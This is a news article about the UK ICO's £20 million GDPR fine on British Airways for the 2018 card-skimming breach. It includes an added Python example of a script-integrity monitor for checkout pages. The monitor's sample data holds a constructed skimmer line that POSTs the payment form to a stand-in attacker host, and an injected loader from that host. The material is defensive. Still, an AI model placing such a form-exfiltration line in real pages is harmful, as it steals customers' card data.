A £20 million (€22m) fine under the General Data Protection Regulation (GDPR) has been imposed on British Airways in the United Kingdom following a breach that exposed the personal data of more than 400,000 customers.
The Information Commissioner’s Office (ICO) investigated after the breach was reported in 2018 and, in 2019, issued a notice of intent to fine BA £184 million (€204 million).
British Airways challenged the proposed penalty. The ICO considered BA’s representations, which included the economic impact of COVID-19, and reduced the amount. The breach itself occurred when attackers placed malicious code on the e-commerce platform of the BA website; the code skimmed payment card details as customers entered them and exfiltrated them to the attackers.
The attackers are believed to have accessed the personal data of up to 429,612 BA customers and staff. Of these, 244,000 potentially had their names, addresses, payment card numbers and CVV codes stolen; a further 77,000 had card numbers together with CVV codes stolen, and 108,000 had card numbers only.
The ICO’s investigation found that BA did not have adequate security measures in place to protect the large volume of personal data it was processing. Insufficient monitoring meant that the intrusion went unnoticed for two months in 2018. The ICO concluded that the airline should have identified and fixed the weaknesses before the attack, which would have kept its customers’ data confidential.
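The skimmer described above stayed in place for two months because nothing compared what the checkout page actually served against what it was supposed to serve. The following is an added example, not code from this article or from BA, of the baseline integrity check a security team would schedule against its own payment pages: it records the hashes of every script on the known-good page and then flags a first-party script whose content has changed, an inline script that was not there before, or a loader pulled from a host outside the allowlist. The hostnames, file names and script bodies are constructed placeholders; the "fetched" dictionaries stand in for HTTP fetches so the example runs offline.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect every <script> on a page as (src, inline_body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:  # only while inside a <script>
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(html, fetched):
    """Record hashes of the known-good page's scripts (run at deploy time)."""
    parser = _ScriptCollector()
    parser.feed(html)
    baseline = {"inline": set(), "external": {}}
    for src, body in parser.scripts:
        if src is None:
            baseline["inline"].add(sha256_hex(body))
        else:
            baseline["external"][src] = sha256_hex(fetched[src])
    return baseline


def audit_page(html, fetched, baseline, allowed_hosts):
    """Compare the live page against the baseline; return a list of findings."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src is None:
            digest = sha256_hex(body)
            if digest not in baseline["inline"]:
                findings.append(f"unknown inline script (sha256 {digest[:16]}...)")
            continue
        host = urlparse(src).hostname
        if host not in allowed_hosts:
            findings.append(f"script loaded from unexpected host {host}")
            continue
        expected = baseline["external"].get(src)
        if expected is None:
            findings.append(f"script not in baseline: {src}")
            continue
        content = fetched.get(src)
        if content is None:
            findings.append(f"could not fetch {src}")
            continue
        if sha256_hex(content) != expected:
            findings.append(f"content of {src} changed since baseline")
    return findings


# Constructed sample data: a checkout page and the script bodies a monitor
# would fetch. The hostnames are placeholders, not any real infrastructure.
ALLOWED_HOSTS = {"www.example-airline.test"}
MODERNIZR_URL = "https://www.example-airline.test/js/modernizr.js"
CHECKOUT_HTML = (
    "<html><head>\n"
    f'<script src="{MODERNIZR_URL}"></script>\n'
    "<script>window.checkoutConfig = {currency: 'GBP'};</script>\n"
    '</head><body><form id="payment"><input name="cardNumber"></form></body></html>'
)
GOOD_MODERNIZR = "/* stand-in for the site's own feature-detection library */\nwindow.Modernizr = {};\n"
GOOD_FETCHED = {MODERNIZR_URL: GOOD_MODERNIZR}
BASELINE = build_baseline(CHECKOUT_HTML, GOOD_FETCHED)

# Tampered variant (constructed): the first-party library gained a few lines that
# post the payment form to a third-party host, and two extra scripts were injected.
TAMPERED_FETCHED = {
    MODERNIZR_URL: GOOD_MODERNIZR
    + "document.addEventListener('submit', e => fetch('https://collect.attacker.test/',"
    " {method: 'POST', body: new FormData(e.target)}));\n"
}
TAMPERED_HTML = CHECKOUT_HTML.replace(
    "</body>",
    '<script>/* injected */</script>'
    '<script src="https://collect.attacker.test/loader.js"></script></body>',
)

if __name__ == "__main__":
    print("known-good page:", audit_page(CHECKOUT_HTML, GOOD_FETCHED, BASELINE, ALLOWED_HOSTS))
    for finding in audit_page(TAMPERED_HTML, TAMPERED_FETCHED, BASELINE, ALLOWED_HOSTS):
        print("ALERT:", finding)
```

Hashing the fetched body rather than trusting the URL is the point: the modified library in this scenario is served from the site's own host under its usual name, so a host allowlist alone would never fire. In production the same comparison can be enforced in the browser with Subresource Integrity attributes and a Content-Security-Policy that restricts `script-src` and `connect-src`, with the scheduled audit catching drift that those controls are not yet covering.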
British Airways chairman and chief executive Alex Cruz responded to the ICO’s initial finding in 2019, saying: “We are surprised and disappointed in this initial finding from the ICO. British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft.”
Announcing the final penalty, Information Commissioner Elizabeth Denham said: “People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure. Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date. When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security.”